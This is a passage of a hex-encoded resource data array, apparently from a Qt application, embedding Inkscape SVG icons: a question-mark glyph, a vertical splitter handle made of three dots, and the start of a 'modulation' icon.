\x6e\x6b\x73\x63\x61\x70\x65\x2d\x66\x6f\x6e\x74\x2d\x73\x70\x65\
\x63\x69\x66\x69\x63\x61\x74\x69\x6f\x6e\x3a\x27\x53\x6f\x75\x72\
\x63\x65\x20\x43\x6f\x64\x65\x20\x50\x72\x6f\x20\x48\x65\x61\x76\
\x79\x27\x3b\x6c\x65\x74\x74\x65\x72\x2d\x73\x70\x61\x63\x69\x6e\
\x67\x3a\x30\x70\x78\x3b\x77\x6f\x72\x64\x2d\x73\x70\x61\x63\x69\
\x6e\x67\x3a\x30\x70\x78\x3b\x66\x69\x6c\x6c\x3a\x23\x30\x30\x35\
\x35\x64\x34\x3b\x66\x69\x6c\x6c\x2d\x6f\x70\x61\x63\x69\x74\x79\
\x3a\x31\x3b\x73\x74\x72\x6f\x6b\x65\x3a\x6e\x6f\x6e\x65\x22\x0a\
\x20\x20\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x74\x65\x78\x74\x35\
\x30\x34\x36\x22\x3e\x0a\x20\x20\x20\x20\x20\x20\x3c\x70\x61\x74\
\x68\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x3d\x22\x4d\x20\
\x33\x2e\x39\x37\x32\x36\x35\x36\x33\x2c\x31\x37\x2e\x34\x37\x32\
\x36\x35\x36\x20\x48\x20\x32\x39\x2e\x30\x31\x31\x37\x31\x39\x20\
\x56\x20\x32\x32\x2e\x30\x36\x32\x35\x20\x48\x20\x33\x2e\x39\x37\
\x32\x36\x35\x36\x33\x20\x5a\x20\x6d\x20\x30\x2c\x38\x2e\x38\x38\
\x36\x37\x31\x39\x20\x48\x20\x32\x39\x2e\x30\x31\x31\x37\x31\x39\
\x20\x76\x20\x34\x2e\x36\x32\x38\x39\x30\x36\x20\x48\x20\x33\x2e\
\x39\x37\x32\x36\x35\x36\x33\x20\x5a\x20\x4d\x20\x31\x37\x2e\x35\
\x38\x35\x39\x33\x37\x2c\x31\x30\x2e\x35\x33\x39\x30\x36\x33\x20\
\x68\x20\x2d\x33\x2e\x35\x33\x35\x31\x35\x36\x20\x76\x20\x2d\x30\
\x2e\x34\x36\x38\x37\x35\x20\x71\x20\x30\x2c\x2d\x30\x2e\x38\x32\
\x30\x33\x31\x33\x20\x30\x2e\x33\x31\x32\x35\x2c\x2d\x31\x2e\x34\
\x32\x35\x37\x38\x31\x37\x20\x30\x2e\x33\x33\x32\x30\x33\x32\x2c\
\x2d\x30\x2e\x36\x32\x35\x20\x31\x2e\x33\x36\x37\x31\x38\x38\x2c\
\x2d\x31\x2e\x35\x38\x32\x30\x33\x31\x33\x20\x6c\x20\x30\x2e\x36\
\x32\x35\x2c\x2d\x30\x2e\x35\x36\x36\x34\x30\x36\x33\x20\x71\x20\
\x30\x2e\x35\x36\x36\x34\x30\x36\x2c\x2d\x30\x2e\x35\x30\x37\x38\
\x31\x32\x35\x20\x30\x2e\x38\x32\x30\x33\x31\x32\x2c\x2d\x30\x2e\
\x39\x35\x37\x30\x33\x31\x32\x20\x30\x2e\x32\x35\x33\x39\x30\x36\
\x2c\x2d\x30\x2e\x34\x34\x39\x32\x31\x38\x38\x20\x30\x2e\x32\x35\
\x33\x39\x30\x36\x2c\x2d\x30\x2e\x38\x39\x38\x34\x33\x37\x35\x20\
\x30\x2c\x2d\x30\x2e\x36\x38\x33\x35\x39\x33\x37\x20\x2d\x30\x2e\
\x34\x36\x38\x37\x35\x2c\x2d\x31\x2e\x30\x35\x34\x36\x38\x37\x35\
\x20\x2d\x30\x2e\x34\x36\x38\x37\x35\x2c\x2d\x30\x2e\x33\x39\x30\
\x36\x32\x35\x20\x2d\x31\x2e\x33\x30\x38\x35\x39\x33\x2c\x2d\x30\
\x2e\x33\x39\x30\x36\x32\x35\x20\x2d\x30\x2e\x38\x30\x30\x37\x38\
\x31\x2c\x30\x20\x2d\x31\x2e\x37\x31\x38\x37\x35\x2c\x30\x2e\x33\
\x33\x32\x30\x33\x31\x33\x20\x2d\x30\x2e\x39\x31\x37\x39\x36\x39\
\x2c\x30\x2e\x33\x31\x32\x35\x20\x2d\x31\x2e\x38\x39\x34\x35\x33\
\x31\x2c\x30\x2e\x39\x35\x37\x30\x33\x31\x32\x20\x56\x20\x31\x2e\
\x34\x31\x37\x39\x36\x38\x37\x20\x51\x20\x31\x33\x2e\x32\x31\x30\
\x39\x33\x38\x2c\x31\x2e\x30\x30\x37\x38\x31\x32\x35\x20\x31\x34\
\x2e\x31\x38\x37\x35\x2c\x30\x2e\x38\x31\x32\x35\x20\x71\x20\x30\
\x2e\x39\x37\x36\x35\x36\x33\x2c\x2d\x30\x2e\x31\x39\x35\x33\x31\
\x32\x35\x20\x31\x2e\x38\x37\x35\x2c\x2d\x30\x2e\x31\x39\x35\x33\
\x31\x32\x35\x20\x32\x2e\x33\x38\x32\x38\x31\x32\x2c\x30\x20\x33\
\x2e\x36\x33\x32\x38\x31\x32\x2c\x30\x2e\x39\x37\x36\x35\x36\x32\
\x35\x20\x31\x2e\x32\x35\x2c\x30\x2e\x39\x37\x36\x35\x36\x32\x35\
\x20\x31\x2e\x32\x35\x2c\x32\x2e\x38\x33\x32\x30\x33\x31\x32\x20\
\x30\x2c\x30\x2e\x39\x35\x37\x30\x33\x31\x33\x20\x2d\x30\x2e\x33\
\x37\x31\x30\x39\x33\x2c\x31\x2e\x37\x31\x38\x37\x35\x20\x51\x20\
\x32\x30\x2e\x32\x30\x33\x31\x32\x35\x2c\x36\x2e\x39\x30\x36\x32\
\x35\x20\x31\x39\x2e\x32\x36\x35\x36\x32\x35\x2c\x37\x2e\x37\x36\
\x35\x36\x32\x35\x20\x6c\x20\x2d\x30\x2e\x36\x32\x35\x2c\x30\x2e\
\x35\x34\x36\x38\x37\x35\x20\x71\x20\x2d\x30\x2e\x36\x36\x34\x30\
\x36\x33\x2c\x30\x2e\x36\x32\x35\x20\x2d\x30\x2e\x38\x35\x39\x33\
\x37\x35\x2c\x30\x2e\x39\x39\x36\x30\x39\x33\x38\x20\x2d\x30\x2e\
\x31\x39\x35\x33\x31\x33\x2c\x30\x2e\x33\x35\x31\x35\x36\x32\x35\
\x20\x2d\x30\x2e\x31\x39\x35\x33\x31\x33\x2c\x30\x2e\x38\x30\x30\
\x37\x38\x31\x32\x20\x7a\x20\x6d\x20\x2d\x33\x2e\x35\x33\x35\x31\
\x35\x36\x2c\x31\x2e\x34\x34\x35\x33\x31\x32\x20\x68\x20\x33\x2e\
\x35\x33\x35\x31\x35\x36\x20\x76\x20\x33\x2e\x34\x37\x36\x35\x36\
\x33\x20\x68\x20\x2d\x33\x2e\x35\x33\x35\x31\x35\x36\x20\x7a\x22\
\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x74\x79\x6c\x65\x3d\
\x22\x66\x69\x6c\x6c\x3a\x23\x30\x30\x35\x35\x64\x34\x3b\x66\x69\
\x6c\x6c\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x31\x22\x0a\x20\x20\
\x20\x20\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x70\x61\x74\x68\x35\
\x30\x34\x38\x22\x20\x2f\x3e\x0a\x20\x20\x20\x20\x3c\x2f\x67\x3e\
\x0a\x20\x20\x3c\x2f\x67\x3e\x0a\x3c\x2f\x73\x76\x67\x3e\x0a\
\x00\x00\x09\x70\
\x3c\
\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\
\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\
\x2d\x38\x22\x20\x73\x74\x61\x6e\x64\x61\x6c\x6f\x6e\x65\x3d\x22\
\x6e\x6f\x22\x3f\x3e\x0a\x3c\x21\x2d\x2d\x20\x43\x72\x65\x61\x74\
\x65\x64\x20\x77\x69\x74\x68\x20\x49\x6e\x6b\x73\x63\x61\x70\x65\
\x20\x28\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x2e\x6f\x72\x67\x2f\x29\x20\x2d\x2d\x3e\x0a\
\x0a\x3c\x73\x76\x67\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x64\
\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x70\x75\x72\x6c\x2e\x6f\
\x72\x67\x2f\x64\x63\x2f\x65\x6c\x65\x6d\x65\x6e\x74\x73\x2f\x31\
\x2e\x31\x2f\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x63\x63\
\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x63\x72\x65\x61\x74\x69\x76\
\x65\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x6f\x72\x67\x2f\x6e\x73\x23\
\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x72\x64\x66\x3d\x22\
\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\
\x67\x2f\x31\x39\x39\x39\x2f\x30\x32\x2f\x32\x32\x2d\x72\x64\x66\
\x2d\x73\x79\x6e\x74\x61\x78\x2d\x6e\x73\x23\x22\x0a\x20\x20\x20\
\x78\x6d\x6c\x6e\x73\x3a\x73\x76\x67\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3d\
\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\
\x72\x67\x2f\x32\x30\x30\x30\x2f\x73\x76\x67\x22\x0a\x20\x20\x20\
\x78\x6d\x6c\x6e\x73\x3a\x73\x6f\x64\x69\x70\x6f\x64\x69\x3d\x22\
\x68\x74\x74\x70\x3a\x2f\x2f\x73\x6f\x64\x69\x70\x6f\x64\x69\x2e\
\x73\x6f\x75\x72\x63\x65\x66\x6f\x72\x67\x65\x2e\x6e\x65\x74\x2f\
\x44\x54\x44\x2f\x73\x6f\x64\x69\x70\x6f\x64\x69\x2d\x30\x2e\x64\
\x74\x64\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\
\x77\x2e\x69\x6e\x6b\x73\x63\x61\x70\x65\x2e\x6f\x72\x67\x2f\x6e\
\x61\x6d\x65\x73\x70\x61\x63\x65\x73\x2f\x69\x6e\x6b\x73\x63\x61\
\x70\x65\x22\x0a\x20\x20\x20\x77\x69\x64\x74\x68\x3d\x22\x38\x6d\
\x6d\x22\x0a\x20\x20\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x31\x36\
\x6d\x6d\x22\x0a\x20\x20\x20\x76\x69\x65\x77\x42\x6f\x78\x3d\x22\
\x30\x20\x30\x20\x38\x20\x31\x36\x22\x0a\x20\x20\x20\x76\x65\x72\
\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x31\x22\x0a\x20\x20\x20\x69\x64\
\x3d\x22\x73\x76\x67\x38\x22\x0a\x20\x20\x20\x69\x6e\x6b\x73\x63\
\x61\x70\x65\x3a\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x30\x2e\x39\
\x32\x2e\x31\x20\x72\x22\x0a\x20\x20\x20\x73\x6f\x64\x69\x70\x6f\
\x64\x69\x3a\x64\x6f\x63\x6e\x61\x6d\x65\x3d\x22\x73\x70\x6c\x69\
\x74\x74\x65\x72\x5f\x68\x61\x6e\x64\x6c\x65\x5f\x76\x65\x72\x74\
\x69\x63\x61\x6c\x2e\x73\x76\x67\x22\x3e\x0a\x20\x20\x3c\x64\x65\
\x66\x73\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x64\x65\x66\x73\
\x32\x22\x20\x2f\x3e\x0a\x20\x20\x3c\x73\x6f\x64\x69\x70\x6f\x64\
\x69\x3a\x6e\x61\x6d\x65\x64\x76\x69\x65\x77\x0a\x20\x20\x20\x20\
\x20\x69\x64\x3d\x22\x62\x61\x73\x65\x22\x0a\x20\x20\x20\x20\x20\
\x70\x61\x67\x65\x63\x6f\x6c\x6f\x72\x3d\x22\x23\x66\x66\x66\x66\
\x66\x66\x22\x0a\x20\x20\x20\x20\x20\x62\x6f\x72\x64\x65\x72\x63\
\x6f\x6c\x6f\x72\x3d\x22\x23\x36\x36\x36\x36\x36\x36\x22\x0a\x20\
\x20\x20\x20\x20\x62\x6f\x72\x64\x65\x72\x6f\x70\x61\x63\x69\x74\
\x79\x3d\x22\x31\x2e\x30\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x3a\x70\x61\x67\x65\x6f\x70\x61\x63\x69\x74\
\x79\x3d\x22\x30\x2e\x30\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x3a\x70\x61\x67\x65\x73\x68\x61\x64\x6f\x77\
\x3d\x22\x32\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\
\x70\x65\x3a\x7a\x6f\x6f\x6d\x3d\x22\x31\x31\x2e\x32\x22\x0a\x20\
\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x63\x78\x3d\
\x22\x32\x38\x2e\x36\x38\x32\x36\x33\x36\x22\x0a\x20\x20\x20\x20\
\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x63\x79\x3d\x22\x33\x35\
\x2e\x31\x32\x38\x36\x37\x39\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\
\x6b\x73\x63\x61\x70\x65\x3a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2d\
\x75\x6e\x69\x74\x73\x3d\x22\x6d\x6d\x22\x0a\x20\x20\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x63\x75\x72\x72\x65\x6e\x74\
\x2d\x6c\x61\x79\x65\x72\x3d\x22\x6c\x61\x79\x65\x72\x31\x22\x0a\
\x20\x20\x20\x20\x20\x73\x68\x6f\x77\x67\x72\x69\x64\x3d\x22\x66\
\x61\x6c\x73\x65\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\
\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x31\x39\x32\x30\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x68\x65\x69\
\x67\x68\x74\x3d\x22\x31\x31\x34\x31\x22\x0a\x20\x20\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\
\x78\x3d\x22\x30\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\
\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x79\x3d\x22\x30\x22\
\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\
\x69\x6e\x64\x6f\x77\x2d\x6d\x61\x78\x69\x6d\x69\x7a\x65\x64\x3d\
\x22\x31\x22\x20\x2f\x3e\x0a\x20\x20\x3c\x6d\x65\x74\x61\x64\x61\
\x74\x61\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x6d\x65\x74\x61\
\x64\x61\x74\x61\x35\x22\x3e\x0a\x20\x20\x20\x20\x3c\x72\x64\x66\
\x3a\x52\x44\x46\x3e\x0a\x20\x20\x20\x20\x20\x20\x3c\x63\x63\x3a\
\x57\x6f\x72\x6b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\
\x66\x3a\x61\x62\x6f\x75\x74\x3d\x22\x22\x3e\x0a\x20\x20\x20\x20\
\x20\x20\x20\x20\x3c\x64\x63\x3a\x66\x6f\x72\x6d\x61\x74\x3e\x69\
\x6d\x61\x67\x65\x2f\x73\x76\x67\x2b\x78\x6d\x6c\x3c\x2f\x64\x63\
\x3a\x66\x6f\x72\x6d\x61\x74\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\
\x20\x3c\x64\x63\x3a\x74\x79\x70\x65\x0a\x20\x20\x20\x20\x20\x20\
\x20\x20\x20\x20\x20\x72\x64\x66\x3a\x72\x65\x73\x6f\x75\x72\x63\
\x65\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x70\x75\x72\x6c\x2e\x6f\
\x72\x67\x2f\x64\x63\x2f\x64\x63\x6d\x69\x74\x79\x70\x65\x2f\x53\
\x74\x69\x6c\x6c\x49\x6d\x61\x67\x65\x22\x20\x2f\x3e\x0a\x20\x20\
\x20\x20\x20\x20\x20\x20\x3c\x64\x63\x3a\x74\x69\x74\x6c\x65\x3e\
\x3c\x2f\x64\x63\x3a\x74\x69\x74\x6c\x65\x3e\x0a\x20\x20\x20\x20\
\x20\x20\x3c\x2f\x63\x63\x3a\x57\x6f\x72\x6b\x3e\x0a\x20\x20\x20\
\x20\x3c\x2f\x72\x64\x66\x3a\x52\x44\x46\x3e\x0a\x20\x20\x3c\x2f\
\x6d\x65\x74\x61\x64\x61\x74\x61\x3e\x0a\x20\x20\x3c\x67\x0a\x20\
\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x6c\x61\x62\
\x65\x6c\x3d\x22\x45\x62\x65\x6e\x65\x20\x31\x22\x0a\x20\x20\x20\
\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x67\x72\x6f\x75\x70\
\x6d\x6f\x64\x65\x3d\x22\x6c\x61\x79\x65\x72\x22\x0a\x20\x20\x20\
\x20\x20\x69\x64\x3d\x22\x6c\x61\x79\x65\x72\x31\x22\x0a\x20\x20\
\x20\x20\x20\x74\x72\x61\x6e\x73\x66\x6f\x72\x6d\x3d\x22\x74\x72\
\x61\x6e\x73\x6c\x61\x74\x65\x28\x30\x2c\x2d\x32\x38\x31\x29\x22\
\x3e\x0a\x20\x20\x20\x20\x3c\x63\x69\x72\x63\x6c\x65\x0a\x20\x20\
\x20\x20\x20\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x66\x69\x6c\x6c\
\x3a\x23\x30\x30\x30\x30\x30\x30\x3b\x66\x69\x6c\x6c\x2d\x6f\x70\
\x61\x63\x69\x74\x79\x3a\x31\x3b\x73\x74\x72\x6f\x6b\x65\x3a\x6e\
\x6f\x6e\x65\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3a\x30\x2e\x32\x35\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6d\x69\x74\
\x65\x72\x6c\x69\x6d\x69\x74\x3a\x34\x3b\x73\x74\x72\x6f\x6b\x65\
\x2d\x64\x61\x73\x68\x61\x72\x72\x61\x79\x3a\x6e\x6f\x6e\x65\x3b\
\x73\x74\x72\x6f\x6b\x65\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x31\
\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x70\x61\x74\
\x68\x34\x34\x38\x37\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x63\x78\
\x3d\x22\x2d\x32\x39\x34\x2e\x39\x38\x36\x34\x38\x22\x0a\x20\x20\
\x20\x20\x20\x20\x20\x63\x79\x3d\x22\x33\x2e\x39\x31\x33\x35\x30\
\x34\x36\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x72\x3d\x22\x31\x2e\
\x39\x31\x33\x35\x30\x34\x35\x22\x0a\x20\x20\x20\x20\x20\x20\x20\
\x74\x72\x61\x6e\x73\x66\x6f\x72\x6d\x3d\x22\x72\x6f\x74\x61\x74\
\x65\x28\x2d\x39\x30\x29\x22\x20\x2f\x3e\x0a\x20\x20\x20\x20\x3c\
\x63\x69\x72\x63\x6c\x65\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x74\
\x79\x6c\x65\x3d\x22\x66\x69\x6c\x6c\x3a\x23\x30\x30\x30\x30\x30\
\x30\x3b\x66\x69\x6c\x6c\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x31\
\x3b\x73\x74\x72\x6f\x6b\x65\x3a\x6e\x6f\x6e\x65\x3b\x73\x74\x72\
\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\x3a\x30\x2e\x32\x35\x3b\x73\
\x74\x72\x6f\x6b\x65\x2d\x6d\x69\x74\x65\x72\x6c\x69\x6d\x69\x74\
\x3a\x34\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x64\x61\x73\x68\x61\x72\
\x72\x61\x79\x3a\x6e\x6f\x6e\x65\x3b\x73\x74\x72\x6f\x6b\x65\x2d\
\x6f\x70\x61\x63\x69\x74\x79\x3a\x31\x22\x0a\x20\x20\x20\x20\x20\
\x20\x20\x69\x64\x3d\x22\x70\x61\x74\x68\x34\x34\x38\x37\x2d\x36\
\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x63\x78\x3d\x22\x2d\x32\x38\
\x39\x2e\x30\x38\x36\x34\x39\x22\x0a\x20\x20\x20\x20\x20\x20\x20\
\x63\x79\x3d\x22\x33\x2e\x39\x31\x33\x35\x30\x34\x36\x22\x0a\x20\
\x20\x20\x20\x20\x20\x20\x72\x3d\x22\x31\x2e\x39\x31\x33\x35\x30\
\x34\x35\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x74\x72\x61\x6e\x73\
\x66\x6f\x72\x6d\x3d\x22\x72\x6f\x74\x61\x74\x65\x28\x2d\x39\x30\
\x29\x22\x20\x2f\x3e\x0a\x20\x20\x20\x20\x3c\x63\x69\x72\x63\x6c\
\x65\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\
\x66\x69\x6c\x6c\x3a\x23\x30\x30\x30\x30\x30\x30\x3b\x66\x69\x6c\
\x6c\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x31\x3b\x73\x74\x72\x6f\
\x6b\x65\x3a\x6e\x6f\x6e\x65\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x77\
\x69\x64\x74\x68\x3a\x30\x2e\x32\x35\x3b\x73\x74\x72\x6f\x6b\x65\
\x2d\x6d\x69\x74\x65\x72\x6c\x69\x6d\x69\x74\x3a\x34\x3b\x73\x74\
\x72\x6f\x6b\x65\x2d\x64\x61\x73\x68\x61\x72\x72\x61\x79\x3a\x6e\
\x6f\x6e\x65\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6f\x70\x61\x63\x69\
\x74\x79\x3a\x31\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x64\x3d\
\x22\x70\x61\x74\x68\x34\x34\x38\x37\x2d\x37\x22\x0a\x20\x20\x20\
\x20\x20\x20\x20\x63\x78\x3d\x22\x2d\x32\x38\x32\x2e\x39\x38\x36\
\x34\x38\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x63\x79\x3d\x22\x33\
\x2e\x39\x31\x33\x35\x30\x34\x36\x22\x0a\x20\x20\x20\x20\x20\x20\
\x20\x72\x3d\x22\x31\x2e\x39\x31\x33\x35\x30\x34\x35\x22\x0a\x20\
\x20\x20\x20\x20\x20\x20\x74\x72\x61\x6e\x73\x66\x6f\x72\x6d\x3d\
\x22\x72\x6f\x74\x61\x74\x65\x28\x2d\x39\x30\x29\x22\x20\x2f\x3e\
\x0a\x20\x20\x3c\x2f\x67\x3e\x0a\x3c\x2f\x73\x76\x67\x3e\x0a\
\x00\x01\x19\x0f\
\x3c\
\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\
\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\
\x2d\x38\x22\x20\x73\x74\x61\x6e\x64\x61\x6c\x6f\x6e\x65\x3d\x22\
\x6e\x6f\x22\x3f\x3e\x0a\x3c\x21\x2d\x2d\x20\x43\x72\x65\x61\x74\
\x65\x64\x20\x77\x69\x74\x68\x20\x49\x6e\x6b\x73\x63\x61\x70\x65\
\x20\x28\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x2e\x6f\x72\x67\x2f\x29\x20\x2d\x2d\x3e\x0a\
\x0a\x3c\x73\x76\x67\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x64\
\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x70\x75\x72\x6c\x2e\x6f\
\x72\x67\x2f\x64\x63\x2f\x65\x6c\x65\x6d\x65\x6e\x74\x73\x2f\x31\
\x2e\x31\x2f\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x63\x63\
\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x63\x72\x65\x61\x74\x69\x76\
\x65\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x6f\x72\x67\x2f\x6e\x73\x23\
\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x72\x64\x66\x3d\x22\
\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\
\x67\x2f\x31\x39\x39\x39\x2f\x30\x32\x2f\x32\x32\x2d\x72\x64\x66\
\x2d\x73\x79\x6e\x74\x61\x78\x2d\x6e\x73\x23\x22\x0a\x20\x20\x20\
\x78\x6d\x6c\x6e\x73\x3a\x73\x76\x67\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3d\
\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\
\x72\x67\x2f\x32\x30\x30\x30\x2f\x73\x76\x67\x22\x0a\x20\x20\x20\
\x78\x6d\x6c\x6e\x73\x3a\x73\x6f\x64\x69\x70\x6f\x64\x69\x3d\x22\
\x68\x74\x74\x70\x3a\x2f\x2f\x73\x6f\x64\x69\x70\x6f\x64\x69\x2e\
\x73\x6f\x75\x72\x63\x65\x66\x6f\x72\x67\x65\x2e\x6e\x65\x74\x2f\
\x44\x54\x44\x2f\x73\x6f\x64\x69\x70\x6f\x64\x69\x2d\x30\x2e\x64\
\x74\x64\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\
\x77\x2e\x69\x6e\x6b\x73\x63\x61\x70\x65\x2e\x6f\x72\x67\x2f\x6e\
\x61\x6d\x65\x73\x70\x61\x63\x65\x73\x2f\x69\x6e\x6b\x73\x63\x61\
\x70\x65\x22\x0a\x20\x20\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x36\
\x70\x78\x22\x0a\x20\x20\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x31\
\x36\x70\x78\x22\x0a\x20\x20\x20\x76\x69\x65\x77\x42\x6f\x78\x3d\
\x22\x30\x20\x30\x20\x31\x36\x20\x31\x36\x22\x0a\x20\x20\x20\x76\
\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x31\x22\x0a\x20\x20\x20\
\x69\x64\x3d\x22\x53\x56\x47\x52\x6f\x6f\x74\x22\x0a\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x76\x65\x72\x73\x69\x6f\x6e\
\x3d\x22\x30\x2e\x39\x32\x2e\x31\x20\x72\x22\x0a\x20\x20\x20\x73\
\x6f\x64\x69\x70\x6f\x64\x69\x3a\x64\x6f\x63\x6e\x61\x6d\x65\x3d\
\x22\x6d\x6f\x64\x75\x6c\x61\x74\x69\x6f\x6e\x2e\x73\x76\x67\x22\
\x3e\x0a\x20\x20\x3c\x73\x6f\x64\x69\x70\x6f\x64\x69\x3a\x6e\x61\
\x6d\x65\x64\x76\x69\x65\x77\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\
\x22\x62\x61\x73\x65\x22\x0a\x20\x20\x20\x20\x20\x70\x61\x67\x65\
\x63\x6f\x6c\x6f\x72\x3d\x22\x23\x66\x66\x66\x66\x66\x66\x22\x0a\
\x20\x20\x20\x20\x20\x62\x6f\x72\x64\x65\x72\x63\x6f\x6c\x6f\x72\
\x3d\x22\x23\x36\x36\x36\x36\x36\x36\x22\x0a\x20\x20\x20\x20\x20\
\x62\x6f\x72\x64\x65\x72\x6f\x70\x61\x63\x69\x74\x79\x3d\x22\x31\
\x2e\x30\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\
\x65\x3a\x70\x61\x67\x65\x6f\x70\x61\x63\x69\x74\x79\x3d\x22\x30\
\x2e\x30\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\
\x65\x3a\x70\x61\x67\x65\x73\x68\x61\x64\x6f\x77\x3d\x22\x32\x22\
\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x7a\
\x6f\x6f\x6d\x3d\x22\x33\x32\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\
\x6b\x73\x63\x61\x70\x65\x3a\x63\x78\x3d\x22\x38\x2e\x30\x33\x38\
\x35\x38\x32\x32\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\
